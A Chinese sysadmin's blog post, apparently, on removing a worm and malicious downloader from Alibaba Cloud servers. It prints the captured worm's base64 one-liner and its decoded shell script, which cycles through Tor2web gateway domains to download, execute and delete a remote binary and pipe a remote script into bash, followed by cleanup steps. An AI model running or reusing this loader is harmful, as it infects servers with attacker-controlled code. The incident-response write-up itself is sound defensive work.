[问题已处理]-阿里云服务器种了蠕虫病毒和恶意下载病毒处理

今天给公司阿里云服务器安装了安骑士 下午就发现有告警，几乎所有的服务器都种了病毒，并且种类还不一样。

1 蠕虫病毒

echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10cnVtcGtwYWF5M3RoMnBzCmRpcj0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmZvciBpIGluIC91c3IvYmluICRkaXIgL2Rldi9zaG0gL3RtcCAvdmFyL3RtcDtkbyB0b3VjaCAkaS9pICYmIGNkICRpICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp4KCkgewpmPS9pbnQKZD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCndnZXQgLXQxIC1UOTkgLXFVLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJGYgLU8kZCB8fCBjdXJsIC1tOTkgLWZzU0xrQS0gJDEkZiAtbyRkCmNobW9kICt4ICRkOyRkO3JtIC1mICRkCn0KdSgpIHsKeD0vY3JuCndnZXQgLXQxIC1UOTkgLXFVLSAtTy0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSR4IHx8IGN1cmwgLW05OSAtZnNTTGtBLSAkMSR4Cn0KZm9yIGggaW4gZDJ3ZWIub3JnIG9uaW9uLm1uIHRvcjJ3ZWIuaW8gb25pb24udG8gb25pb24uaW4ubmV0IDR0b3IubWwgb25pb24uZ2xhc3MgY2l2aWNsaW5rLm5ldHdvcmsgdG9yMndlYi5zdSBvbmlvbi5seSBvbmlvbi5wZXQgb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMCkvaW87IHRoZW4KeCB0cnVtcGtwYWF5M3RoMnBzLiRoCmVsc2UKYnJlYWsKZmkKZG9uZQoKaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMCkvaW87IHRoZW4KKAp1ICR0LnRvcjJ3ZWIuaW8gfHwKdSAkdC5vbmlvbi50byB8fAp1ICR0Lm9uaW9uLm1uIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQuNHRvci5tbCB8fAp1ICR0LmQyd2ViLm9yZyB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC50b3Iyd2ViLnN1IHx8CnUgJHQub25pb24ubHkgfHwKdSAkdC5vbmlvbi5wZXQgfHwKdSAkdC5vbmlvbi53cwopfGJhc2gKZmkK|base64 -d|bash

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=trumpkpaay3th2ps
dir=$(grep x:$(id -uc): /etc/passwd|cut -d: -f6)
for i in /usr/bin $dir /dev/shm /tmp /var/tmp;do touch $i/i && cd $i && rm -f i && break;done
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d-)
wget -t1 -T99 -qU- --no-check-certificate $1$f -O$d || curl -m99 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
u() {
x=/crn
wget -t1 -T99 -qU- -O- --no-check-certificate $1$x || curl -m99 -fsSLkA- $1$x
}
for h in d2web.org onion.mn tor2web.io onion.to onion.in.net 4tor.ml onion.glass civiclink.network tor2web.su onion.ly onion.pet onion.ws
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/00)/io; then
x trumpkpaay3th2ps.$h
else
break
fi
done

if ! ls /proc/$(head -n 1 /tmp/.X11-unix/00)/io; then
(
u $t.tor2web.io ||
u $t.onion.to ||
u $t.onion.mn ||
u $t.onion.in.net ||
u $t.4tor.ml ||
u $t.d2web.org ||
u $t.onion.glass ||
u $t.civiclink.network ||
u $t.tor2web.su ||
u $t.onion.ly ||
u $t.onion.pet ||
u $t.onion.ws
)|bash
fi

pstree 查找可疑进程

杀死可疑的蠕虫守护进程8RVl38

2 访问恶意下载源

有类似ssh爆破内网的嫌疑 建议检查一下免密登陆的机子

处理方式

1 删除crontab -e里的可疑文件
2 删除/root下的隐藏可以sh
ls -a /root |grep -E  "^\..*\.sh$"
3 删除/opt下的可疑文件
4 pstree查看可疑进程
5 查找curl echo wget 相关的进程或者可疑脚本名称的进程
ps -ef |grep -E 'wget|curl|echo' 
6 修改/etc/hosts的可疑解析
7 观察

清理完定时任务和脚本后 杀死进程最上级的父进程 再递减杀死pid